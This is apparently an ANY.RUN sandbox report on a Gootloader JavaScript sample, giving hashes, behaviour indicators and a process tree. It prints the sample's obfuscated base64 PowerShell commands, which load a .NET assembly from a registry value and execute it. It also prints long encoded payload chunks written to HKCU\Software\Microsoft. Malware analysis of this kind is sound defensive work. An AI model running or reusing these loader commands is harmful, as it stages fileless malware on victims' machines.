File name:

gootloader-payload.js

Full analysis: https://app.any.run/tasks/fa097eb6-34b3-40f3-94d6-7a24e7631884
Verdict: Malicious activity
Analysis date: July 13, 2022, 11:03:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

D7C2868E314FC00F815090389B16D9B3

SHA1:

79C3BDEEF8F68BF5311BEEAB582957C235976469

SHA256:

01753BB8DEB6370415D565E1B1F867745F45E125252D0C7034DD01C17BB35897

SSDEEP:

3072:Exs4gk98UsWY/jJg1PTJOzWJDTto2KJweawaP:sfOiOz6Z8JweawaP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the computer name

      • WScript.exe (PID: 2900)
      • powershell.exe (PID: 2104)
      • powershell.exe (PID: 2620)
    • Checks supported languages

      • powershell.exe (PID: 2104)
      • WScript.exe (PID: 2900)
      • powershell.exe (PID: 2620)
    • Application launched itself

      • powershell.exe (PID: 2104)
      • powershell.exe (PID: 2620)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2900)
      • powershell.exe (PID: 2104)
      • powershell.exe (PID: 2620)
  • INFO

    • Checks Windows Trust Settings

      • WScript.exe (PID: 2900)
      • powershell.exe (PID: 2104)
      • powershell.exe (PID: 2620)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
2104"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "/"e" N"Q"A3"ADgA"MwAz"AD"gAOAA5"ADA"AOwBzAG"w"AZ"QBlA"HAAIAAtAHMAIAA4"ADQAOw"Ak"A"HQAZwB4AD0A"RwBlA"HQALQ"BJA"HQAZQBtAF"AAcgBvAHAAZQ"ByA"HQAeQA"gAC0Ac"ABhAHQAaAAgACg"AIg"Bo"AGsAIgArACIAYwB1ADoAXABzAG8A"ZgAiAC"sA"IgB"0AHcAIgA"rA"C"IA"YQB"yAGU"AXA"BtA"GkAY"w"Ai"AC"sAIgBy"A"G8"Ac"wA"iA"C"sA"IgBvAGYA"dA"BcAC"IAKwB"bAEUA"bgB2AGkA"cgBvAG"4Ab"QBl"A"G4AdAB"dADoAOgA"o"ACIAdQB"zAGU"AIgArA"CIAcg"BuACIAK"wA"iAGE"AbQ"BlACIAKQArAC"I"AMA"AiAC"kAOw"B"mAG8AcgAgAC"g"AJAB"zAGoAPQAwADsAJA"B"zAGoA"I"AAtA"GwAZ"Q"A"gADcAM"AA0"ADs"AJAB"z"AG"o"AKwArACk"AewBUAHI"A"eQB7A"CQAdwBrAC"sA"PQAkAH"QAZwB4AC4AJ"ABzAGoA"fQ"BD"AGEAd"ABjAG"gAewB9AH0AOwAkAHMAagA9ADAAOwB3AGgA"aQB"sAGUAKA"Ak"AHQAcg"B1AGUAKQB7ACQA"cwBq"ACs"A"K"wA7AC"QA"awBvAD0AWw"Bt"AGEAdABo"AF"0A"O"gA6ACgAIgB"zA"HEA"IgArAC"I"AcgB0ACIAKQ"AoA"C"QAcwB"q"ACk"AOwBpAGYAKAA"kAGsAb"w"AgAC0AZQBxAC"AAMQA"w"ADA"AMAA"pAHsAYgB"yAGUAYQ"BrAH0AfQAk"AGo"AY"wB2A"D0"AJ"AB3AGsALgByA"GUAc"ABsA"G"EAYwBlACgA"I"gAjA"CIA"L"A"AkAGsAbw"A"pADs"AJAB"pAHAAbAA9AFsA"YgB5"AHQAZQB"bAF0"A"XQA6A"DoAKAAiAG4"AZQAiACsAIgB3ACIAK"QA"oACQAagBjAHYA"LgBMA"GUAbgB"nAH"QA"a"AAvAD"IAK"QA7AGYAbwByACgAJABzAGoAPQA"wADsA"JA"BzAGoAIAA"tAG"w"AdAAgA"C"QAa"gBjAH"YA"LgBMA"GUAbgBn"AHQ"Aa"AA7ACQAc"wBq"ACsAP"Q"AyACkAewA"kAG"kAc"A"B"sAF"sA"J"ABzAGoALwAyAF0APQ"BbAG"MAbw"B"uAHYAZQ"By"AHQAXQA6ADoAKAAi"AFQAbwB"CACIAKwAiAHkAdABlACIA"K"QAo"ACQAag"BjAHYAL"gBT"AH"U"AYgBz"A"HQAc"g"Bp"AG4AZw"AoACQAcw"BqACwAMgApACw"AKAA"yACoAOAApAC"kAf"QBb"AHIAZ"Q"B"mAGwAZQB"jAHQAaQB"vA"G"4"AL"gBhA"HMAcwBl"A"G"0AYgBs"AHkAXQA6ADoAKAAi"A"E"wAbwAiA"CsAIgBhAGQ"AIgA"p"ACgAJ"ABpAHAAb"AAp"ADs"A"WwBPAH"AAZQ"BuAF0AOg"A6"ACgAIgBUAG"UAI"g"ArA"CIAcwB0ACIAKQAoA"CkAO"wA0A"DgANA"A"2ADc"AMgA1"ADYAOAA7AA="=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2620"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /e NQA3ADgAMwAzADgAOAA5ADAAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADQAOwAkAHQAZwB4AD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACgAIgBoAGsAIgArACIAYwB1ADoAXABzAG8AZgAiACsAIgB0AHcAIgArACIAYQByAGUAXABtAGkAYwAiACsAIgByAG8AcwAiACsAIgBvAGYAdABcACIAKwBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgAoACIAdQBzAGUAIgArACIAcgBuACIAKwAiAGEAbQBlACIAKQArACIAMAAiACkAOwBmAG8AcgAgACgAJABzAGoAPQAwADsAJABzAGoAIAAtAGwAZQAgADcAMAA0ADsAJABzAGoAKwArACkAewBUAHIAeQB7ACQAdwBrACsAPQAkAHQAZwB4AC4AJABzAGoAfQBDAGEAdABjAGgAewB9AH0AOwAkAHMAagA9ADAAOwB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQB7ACQAcwBqACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwBqACkAOwBpAGYAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAYgByAGUAYQBrAH0AfQAkAGoAYwB2AD0AJAB3AGsALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApADsAJABpAHAAbAA9AFsAYgB5AHQAZQBbAF0AXQA6ADoAKAAiAG4AZQAiACsAIgB3ACIAKQAoACQAagBjAHYALgBMAGUAbgBnAHQAaAAvADIAKQA7AGYAbwByACgAJABzAGoAPQAwADsAJABzAGoAIAAtAGwAdAAgACQAagBjAHYALgBMAGUAbgBnAHQAaAA7ACQAcwBqACsAPQAyACkAewAkAGkAcABsAFsAJABzAGoALwAyAF0APQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAFQAbwBCACIAKwAiAHkAdABlACIAKQAoACQAagBjAHYALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwBqACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABpAHAAbAApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA0ADgANAA2ADcAMgA1ADYAOAA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
2900"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\gootloader-payload.js"C:\Windows\System32\WScript.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
1 845
Read events
1 733
Write events
112
Delete events
0

Modification events

(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:(default)
Value:
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:0
Value:
yduasqvtqqvyqqffffqvbpqqqqvvyqqqqqqqqqqqqqqqqqqqqqqqvvpqqvvewfbavevvbyvscdrwbpvwyccdrwuyipisotrvovorifiooriwidrvitiwieieifoyrviriurvorouiervisiervyyyfutrvidifiyiurevdvdvaryqqqqvvuvyuqviypivavvdbwfccirqqqqqvfqrfvrvbvrvrwovvbavrqvirqqvaqvdvwyqqwqqqyqqqqvwqqvvrqvvyqqqqquqrqqqqsvvtqvvyqvyybvvtqtqqqvrqqqqvwqqqqqvvwqqqqvwqqqqqqqwqqqqqqqqvrvvtvvacvsqquvvtvvuptyqqfvvrvvycvrqqqqqqqqqqqqqqqqqqqqqqqqqqqqvvyvvtvvrpqqqqqqqqqqqqvviprrvtvvwpvrqqqqqqqqqqqqqqqqqvreoyiuopoyqquvbpvrqvwqqvbavrqvvyqqqqqqqqqvrquvivreiyiwoyiwqqivvcqqdvvrqvveqqbevrqqqqqqqqvvyquvcvreoriyiwoyiwqvupviqqevvrqvvpqqccvrqqqqqqqqvvyquvyvreoviyiwoyiwqvycvrqqfvvrqvvyqqdyvrqqqqqqqqvvyqtvyvreopiyiwoyiwqvwcvrqqqtqvvyqqdpvrqqqqqqqqvvyqtvyvreirototqqvvfvvsqqwvvtqqqqqqqqqqqqqqpqivcvreisiyiwoyiwqvacvsqqrvvtqvvaqqdcvrqqqqqqqqvvyqtvcvreyturuyqqvvipqqvvtvvtqvvrqqeivrqqqqqqqqvvyqyvcvreoyicotqqvvuqqqyvvtqvvrqqepvrqqqqqqqqvvyqivcvreorotoritqquptyqquvvtqvtiqqeavrqqqqqqqqvvyqtvcqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqctiiiiiiiiiiiirevfwfpyqqqvypptecrptwcviipwtdewefffffyduacovutfqtqwqqcovutwqtqwqqcovurtqtqwqqcovursqtqwqqoyiopsvubsffvrvvpbvurbqtvvpucvoyypbsvrqqeppubuvrvvypcocwffffffffeprwavvrvvpbwuwbqtvvyppsvutcvsvtvvyppsvurdvsvtvvyppbvuviwtvtvvpswveptfauvrvvpttdppcbvrqwoyiitwcvypptcyrpctbsvwqqeptdbuvrvvebbivfwfvvypitvdpuefffffyppdwuyrefffffypvwcapwtauvyuqvoupvvfboyawpiipwfsvbvwoytfiipwfsvbvrvfpuiaffffffptbapyqqvevfpiudffffffpbsrfpqqtwcvpudrvfsucvesybffffffiisvyppdvdtsauvrvvepryauvrvvtwcvypptcyrpctptoaoyvevfpircffffffpbpaepqqtwcvpucsvfsucveswaffffffsvypptectppbvuiiffvrvvyypbvdifffvrvvycpdvudvfevrvvyppdwudwfevrvvyppdvddrfevrvvpsvuayfevrvvyppdvusdfevrvvyppsyyryrvepptbyvrvvpsvusdfevrvvypptcytpctvfwfpyqqqvywuuywuyuuuouiutyppwecspqqyypbwdeafevrvvtwcvbsvdqqyppduyryrvyupudbyppsdoftypabvfpuafvrqviuyppbvyrutqqvtwfiyppbupvpyppbtdtwwwvtvvebwovfwfpqqqyptsctvfpyrovrqvbsepvtqvffdoyppsfvfvypvfbwwddcvovtvvyppucvoudfpbvucsvovtvvtwdbptfpvwvfpywrvrqvpbvubpvovtvvpucvvfpyivvrqvcovueafdvrqwqqpbvuavvovtvvptfpvwvfpyvyvrqvpudbvfpyrwvrqvyppbvufpcdvrvvyppucvoyvcyutwcvbavrqqtwcsffdvepsraovrvvyppdvdcbawvrvvffwusuwvvtvvyppsvuuefevrvvepcsavvrvvyppdvdsrfdffffepcucsvrvvepppaavrvvyppdvupwedffffyppsvurrvovtvvyppbvuebwvvtvvyppbvvyppucvoyurtwcsebwpvfwfpqqqpydroytcpucsoyrcbsvwqqypptcvvwvfbiwvpvfarvoeeoywpscpywptfvvwpvfarrywvfyycpebeyvfwfpqqqpydroyvcypptcvvwvfbiwvpvfarvoefvyppsvubsvivtvvyypbwusrfdvrvvyupudroywifiyyryucvwbpvaqqvfpuefqqpsvufobcvrvvyypbruwpfdvrvvyupdicryvwyditedyscweuvtycpsesepfcbrvrvvyupueyyppscuyppbtdeffcvrqfpeubvwqvtwdbvfwfpqqqyppbvcdfepdfbrvrvvyppdovvwyppsfwepcbbrvrvvyppsyyddvvyppbwydfyppscwyspsfvypptctvwepctbrvrvvywtsdcofceysptedvpyacoyyrdqqqvyppsrdsafcvrvvepruaavrvvyppbwupifcvrvvyppbvubovfvtvvpbvdpsfcvrvvyppswvycpbvuiffcvrvvyppbwuovfcvrvvepybbyvrvvyypbvdycfcvrvvpsvuyafcvrvvyupucsvfpycfqqyypbvutrfcvrvvyupucvouvbepucbrvrvvpbvurafcvrvvyppwcyspqqubueufudywucywudctvfboyyryivesvoffffffvfwfyqpbvubavuvtvvbbvwqqptfpvwvfpueefdffffbswfqqeprrbrvrvvpbvuscvuvtvvptfpvwvfpufcfdffffyppdwudcwbvtvvyppdvdcuwbvtvvepvpbrvrvvpudbcovuoyvuvtqrqqvfpudffdfffftwcvyppovuidvuvtvvesdwfdffffyppsdwffwutovevtvvesytfdffffiisvyppdwubswbvtvvyppdvdsawbvtvvcovutpvuvtqwqqepbbbwvrvvesppfdffffyutwedesdcfeffffpscwvfwfyqepabbwvrvvsviirevfwfpyqqqvypptecrpcovucrfbvrqwqqepvdasvrvvepbpfcffffsvsvypptcyrpctsvypptecrpcovuarfbvrqqqvepedapvrvvepspfcffffsvsvypptcyrpctsvypptecrpptfavroyveyppbvutvvfvtvvypptcyrpypffevtwcsffwuysvfvtvvtwcvypptcyrpctywuoywuiywuuywuyuuuouiutyppwecapvcqvtwdryppsycryovyypsycryoctwcsffwurbvfvtvvpucvouviffwuuwvdvtvvffwurbvdvtvvtwdrtwcsffwuwwvfvtvvpucvouviffwutovdvtvvtwdrtwcsffwufdvevtvvpucvouviffwurtvdvtvvtwdrtwcsffwuesvevtvvpucvouviffwuvfvdvtvvtwdrtwcsffwuduvevtvvpucvouviffwufbvcvtvvtwdrtwcsffwucwvevtvvpucvouviffwueovcvtvvtwdrtwcsffwuadvevtvvpucvouviffwudtvcvtvvtwdrtwcsffwussvevtvvpucvouviffwubfvcvtvvtwdrtwcsffwupuvevtvvpucvouviffwuabvcvtvvtwdrtwcsffwuowvevtvvpucvouviffwusovcvtvvtwdrtwcsffwuudvevtvvpucvouviffwuptvcvtvvtwdrtwcsff
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:1
Value:
wuysvevtvvpucvouviffwuifvcvtvvtwdrtwcsffwutuvevtvvpucvouviffwuubvcvtvvtwdrtwcsffwurwvevtvvpucvouviffwuyovcvtvvtwdrtwcsffwuvdvevtvvpucvouviffwuttvcvtvvtwdrtwcsffwufsvdvtvvpucvouviffwuwfvcvtvvtwdrtwcsffwueuvdvtvvpucvouviffwuvbvcvtvvtwdrtwcsffwudwvdvtvvpucvouviffwufovbvtvvtwdrtwcsffwubdvdvtvvpucvouviffwuetvbvtvvtwdrtwcsffwuasvdvtvvpucvouviffwucfvbvtvvtwdrtwcsffwusuvdvtvvpucvouviffwubbvbvtvvtwdrtwcsffwupwvdvtvvpucvouviffwuaovbvtvvtwdrtwcsffwuidvdvtvvpucvouviffwustvbvtvvtwdrtwcsffwuusvdvtvvpucvouviffwuofvbvtvvtwdrtwcsffwuyuvdvtvvpucvouviffwuibvbvtvvtwdrtwcsffwutwvdvtvvpucvouviffwuuovbvtvvtwdrtwcsffwuwdvdvtvvpucvouviffwuytvbvtvvtwdrtwcsffwuvsvdvtvvpucvouviffwurfvbvtvvtwdrtwcsffwufuvcvtvvpucvouviffwuwbvbvtvvtwdrtwcsffwuewvcvtvvpucvouviffwuvovbvtvvtwdrtwcsffwucdvcvtvvpucvouviffwuftvavtvvtwdrtwcsffwubsvcvtvvpucvouviffwudfvavtvvtwdrtwcsffwuauvcvtvvpucvouviffwucbvavtvvtwdrtwcsffwuswvcvtvvpucvouviffwubovavtvvtwdrtwcsffwuodvcvtvvpucvouviffwuatvavtvvtwdrtwcsffwuisvcvtvvpucvouviffwupfvavtvvtwdrtwcsffwuuuvcvtvvpucvouviffwuobvavtvvtwdrtwcsffwuywvcvtvvpucvouviffwuiovavtvvtwdrtwcsffwurdvcvtvvpucvouviffwuutvavtvvtwdrtwcsffwuwsvcvtvvpucvouviffwutfvavtvvtwdrtwcsffwuvuvcvtvvpucvouviffwurbvavtvvtwdrtwcsffwufwvbvtvvpucvouviffwuwovavtvvtwdrtwcsffwuddvbvtvvpucvouviffwuvtvavtvvtwdrtwcsffwucsvbvtvvpucvouviffwuefvsvtvvtwdrtwcsffwubuvbvtvvpucvouviffwudbvsvtvvtwdrtwcsffwuawvbvtvvpucvouviffwucovsvtvvtwdrtwcsffwupdvbvtvvpucvouviffwubtvsvtvvtwdrtwcsffwuosvbvtvvpucvouviffwusfvsvtvvtwdrtwcsffwuiuvbvtvvpucvouviffwupbvsvtvvtwdrtwcsffwuuwvbvtvvpucvouviffwuoovsvtvvtwdrtwcsffwutdvbvtvvpucvouviffwuitvsvtvvtwdrtwcsffwursvbvtvvpucvouviffwuyfvsvtvvtwdrtwcsffwuwuvbvtvvpucvouviffwutbvsvtvvtwdrtwcsffwuvwvbvtvvpucvouviffwurovsvtvvtwdrtwcsffwuedvavtvvpucvouviffwuwtvsvtvvtwdrtwcsffwudsvavtvvpucvouviffwuffvpvtvvtwdrtwcsffwucuvavtvvpucvouviffwuebvpvtvvtwdrtwcsffwubwvavtvvpucvouviffwudovpvtvvtwdrtwcsffwusdvavtvvpucvouviffwuctvpvtvvtwdrtwcsffwupsvavtvvpucvouviffwuafvpvtvvtwdrtwcsffwuouvavtvvpucvouviffwusbvpvtvvtwdrtwcsffwuiwvavtvvpucvouviffwupovpvtvvtwdrtwcsffwuydvavtvvpucvouviffwuotvpvtvvtwdrtwcsffwutsvavtvvpucvouviffwuufvpvtvvtwdrtwcsffwuruvavtvvpucvouviffwuybvpvtvvtwdrtwcsffwuwwvavtvvpucvouviffwutovpvtvvtwdrtwcsffwufdvsvtvvpucvouviffwurtvpvtvvtwdrtwcsffwuesvsvtvvpucvouviffwuvfvpvtvvtwdrtwcsffwuduvsvtvvpucvouviffwufbvovtvvtwdrtwcsffwucwvsvtvvpucvouviffwueovovtvvtwdrtwcsffwuadvsvtvvpucvouviffwudtvovtvvtwdrtwcsffwussvsvtvvpucvouviffwubfvovtvvtwdrtwcsffwupuvsvtvvpucvouviffwuabvovtvvtwdrtwcsffwuowvsvtvvpucvouviffwusovovtvvtwdrtwcsffwuudvsvtvvpucvouviffwuptvovtvvtwdrtwcsffwuysvsvtvvpucvouviffwuifvovtvvtwdrtwcsffwutuvsvtvvpucvouviffwuubvovtvvtwdrtwcsffwurwvsvtvvpucvouviffwuyovovtvvtwdrtwcsffwuvdvsvtvvpucvouviffwuttvovtvvtwdrtwcsffwufsvpvtvvpucvouviffwuwfvovtvvtwdrtwcsffwueuvpvtvvpucvouviffwuvbvovtvvtwdrtwcsffwudwvpvtvvpucvouviffwufovivtvvtwdrtwcsffwubdvpvtvvpucvouviffwuetvivtvvtwdrtwcsffwuasvpvtvvpucvouviffwucfvivtvvtwdrtwcsffwusuvpvtvvpucvouviffwubbvivtvvtwdrtwcsffwupwvpvtvvpucvouviffwuaovivtvvtwdrtwcsffwuidvpvtvvpucvouviffwustvivtvvtwdrtwcsffwuusvpvtvvpucvouviffwuofvivtvvtwdrtwcsffwuyuvpvtvvpucvouviffwuibvivtvvtwdrtwcsffwutwvpvtvvpucvouviffwuuovivtvvtwdrtwcsffwuwdvpvtvvpucvouviffwuytvivtvvtwdrtwcsffwuvsvpvtvvpucvouviffwurfvivtvvtwdrtwcsffwufuvovtvvpucvouviffwuwbvivtvvtwdrtwcsffwuewvovtvvpucvouviffwuvovivtvvtwdrtwcsffwucdvovtvvpucvouviffwuftvuvtvvtwdrtwcsffwubsvovtvvpucvouviffwudfvuvtvvtwdrtwcsffwuauvovtvvpucvouviffwucbvuvtvvtwdrtwcsffwuswvovtvvpucvouviffwubovuvtvvtwdrtwcsffwuodvovtvvpucvouviffwuatvuvtvvtwdrtwcsffwuisvovtvvpucvouviffwupfvuvtvvtwdrtwcsffwuuuvovtvvpucvouviffwuobvuvtvvtwdrtwcsffwuywvovtvvpucvouviffwuiovuvtvvtwdrtwcsffwurdvovtvvpucvouviffwuutvuvtvvtwdrtwcsffwuwsvovtvvpucvouviffwutfvuvtvvtwdrtwcsffwuvuvovtvvpucvouviffwurbvuvtvvtwdrtwcsffwufwvivtvvpucvouviffwuwovuvtvvtwdrtwcsffwuddvivtvvpucvouviffwuvtvuvtvvtwdrtwcsffwucsvivtvvpucvouviffwuefvyvtvvtwdrtwcsffwubuvivtvvpucvouviffwudbvyvtvvtwdrtwcsffwuawvivtvvpucvouviffwucovyvtvvtwdrtwcsffwupdvivtvvpucvouviffwubtvyvtvvtwdrtwcsff
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:2
Value:
wuosvivtvvpucvouviffwusfvyvtvvtwdrtwcsffwuiuvivtvvpucvouviffwupbvyvtvvtwdrtwcsffwuuwvivtvvpucvouviffwuoovyvtvvtwdrtwcsffwutdvivtvvpucvouviffwuitvyvtvvtwdrtwcsffwursvivtvvpucvouviffwuyfvyvtvvtwdrtwcsffwuwuvivtvvpucvouviffwutbvyvtvvtwdrtwcsffwuvwvivtvvpucvouviffwurovyvtvvtwdrtwcsffwuedvuvtvvpucvouviffwuwtvyvtvvtwdrtwcsffwudsvuvtvvpucvouviffwuffvtvtvvtwdrtwcsffwucuvuvtvvpucvouviffwuebvtvtvvtwdrtwcsffwubwvuvtvvpucvouviffwudovtvtvvtwdrtwcsffwusdvuvtvvpucvouviffwuctvtvtvvtwdrtwcsffwupsvuvtvvpucvouviffwuafvtvtvvtwdrtwcsffwuouvuvtvvpucvouviffwusbvtvtvvtwdrtwcsffwuiwvuvtvvpucvouviffwupovtvtvvtwdrtwcsffwuydvuvtvvpucvouviffwuotvtvtvvtwdrtwcsffwutsvuvtvvpucvouviffwuufvtvtvvtwdrtwcsffwuruvuvtvvpucvouviffwuybvtvtvvtwdrtwcsffwuwwvuvtvvpucvouviffwutovtvtvvtwdrtwcsffwufdvyvtvvpucvouviffwurtvtvtvvtwdrtwcsffwuesvyvtvvpucvouviffwuvfvtvtvvtwdrtwcsffwuduvyvtvvpucvouviffwufbvrvtvvtwdrtwcsffwucwvyvtvvpucvouviffwueovrvtvvtwdrtwcsffwuadvyvtvvpucvouviffwudtvrvtvvtwdrtwcsffwussvyvtvvpucvouviffwubfvrvtvvtwdrtwcsffwupuvyvtvvpucvouviffwuabvrvtvvtwdrtwcsffwuowvyvtvvpucvouviffwusovrvtvvtwdrtwcsffwuudvyvtvvpucvouviffwuptvrvtvvtwdrtwcsffwuysvyvtvvpucvouviffwuifvrvtvvtwdrtwcsffwutuvyvtvvpucvouviffwuubvrvtvvtwdrtwcsffwurwvyvtvvpucvouviffwuyovrvtvvtwdrtwcsffwuvdvyvtvvpucvouviffwuttvrvtvvtwdrtwcsffwufsvtvtvvpucvouviffwuwfvrvtvvtwdrtwcsffwueuvtvtvvpucvouviffwuvbvrvtvvtwdrtwcsffwudwvtvtvvpucvouviffwufovwvtvvtwdrtwcsffwubdvtvtvvpucvouviffwuetvwvtvvtwdrtwcsffwuasvtvtvvpucvouviffwucfvwvtvvtwdrtwcsffwusuvtvtvvpucvouviffwubbvwvtvvtwdrtwcsffwupwvtvtvvpucvouviffwuaovwvtvvtwdrtwcsffwuidvtvtvvpucvouviffwustvwvtvvtwdrtwcsffwuusvtvtvvpucvouviffwuofvwvtvvtwdrtwcsffwuyuvtvtvvpucvouviffwuibvwvtvvtwdrtwcsffwutwvtvtvvpucvouviffwuuovwvtvvtwdrtwcsffwuwdvtvtvvpucvouviffwuytvwvtvvtwdrtwcsffwuvsvtvtvvpucvouviffwurfvwvtvvtwdrtwcsffwufuvrvtvvpucvouviffwuwbvwvtvvtwdrtwcsffwuewvrvtvvpucvouviffwuvovwvtvvtwdrtwcsffwucdvrvtvvpucvouviffwuftqtvvtwdrtwcsffwubsvrvtvvpucvouviffwudfqtvvtwdrtwcsffwuauvrvtvvpucvouviffwucbqtvvtwdrtwcsffwuswvrvtvvpucvouviffwuboqtvvtwdrtwcsffwuodvrvtvvpucvouviffwuatqtvvtwdrtwcsffwuisvrvtvvpucvouviffwupfqtvvtwdrtwcsffwuuuvrvtvvpucvouviffwuobqtvvtwdrtwcsffwuywvrvtvvpucvouviffwuioqtvvtwdrtwcsffwurdvrvtvvpucvouviffwuutqtvvtwdrtwcsffwuwsvrvtvvpucvouviffwutfqtvvtwdrtwcsffwuvuvrvtvvpucvouviffwurbqtvvtwdrtwcsffwufwvwvtvvpucvouviffwuwoqtvvtwdrtwcsffwuddvwvtvvpucvouviffwuvtqtvvtwdrtwcsffwucsvwvtvvpucvouviffwuefffvrvvtwdrtwcsffwubuvwvtvvpucvouviffwudbffvrvvtwdrtwcsffwuawvwvtvvpucvouviffwucoffvrvvtwdrtwcsffwupdvwvtvvpucvouviffwubtffvrvvtwdrtwcsffwuosvwvtvvpucvouviffwusfffvrvvtwdrtwcsffwuiuvwvtvvpucvouviffwupbffvrvvtwdrtwcsffwuuwvwvtvvpucvouviffwuooffvrvvtwdrtwcsffwutdvwvtvvpucvouviffwuitffvrvvtwdrtwcsffwursvwvtvvpucvouviffwuyfffvrvvtwdrtwcsffwuwuvwvtvvpucvouviffwutbffvrvvtwdrtwcsffwuvwvwvtvvpucvouviffwuroffvrvvtwdrtwcsffwuedqtvvpucvouviffwuwtffvrvvtwdrtwcsffwudsqtvvpucvouviffwufffevrvvtwdrtwcsffwucuqtvvpucvouviffwuebfevrvvtwdrtwcsffwubwqtvvpucvouviffwudofevrvvtwdrtwcsffwusdqtvvpucvouviffwuctfevrvvtwdrtwcsffwupsqtvvpucvouviffwuaffevrvvtwdrtwcsffwuouqtvvpucvouviffwusbfevrvvtwdrtwcsffwuiwqtvvpucvouviffwupofevrvvtwdrtwcsffwuydqtvvpucvouviffwuotfevrvvtwdrtwcsffwutsqtvvpucvouviffwuuffevrvvtwdrtwcsffwuruqtvvpucvouviffwuybfevrvvtwdrtwcsffwuwwqtvvpucvouviffwutofevrvvtwdrtwcsffwufdffvrvvpucvouviffwurtfevrvvtwdrtwcsffwuesffvrvvpucvouviffwuvffevrvvtwdrtwcsffwuduffvrvvpucvouviffwufbfdvrvvtwdrtwcsffwucwffvrvvpucvouviffwueofdvrvvtwdrtwcsffwuadffvrvvpucvouviffwudtfdvrvvtwdrtwcsffwussffvrvvpucvouviffwubffdvrvvtwdrtwcsffwupuffvrvvpucvouviffwuabfdvrvvtwdrtwcsffwuowffvrvvpucvouviffwusofdvrvvtwdrtwcsffwuudffvrvvpucvouviffwuptfdvrvvtwdrtwcsffwuysffvrvvpucvouviffwuiffdvrvvtwdrtwcsffwutuffvrvvpucvouviffwuubfdvrvvtwdrtwcsffwurwffvrvvpucvouviffwuyofdvrvvtwdrtwcsffwuvdffvrvvpucvouviffwuttfdvrvvtwdrtwcsffwufsfevrvvpucvouviffwuwffdvrvvtwdrtwcsffwueufevrvvpucvouviffwuvbfd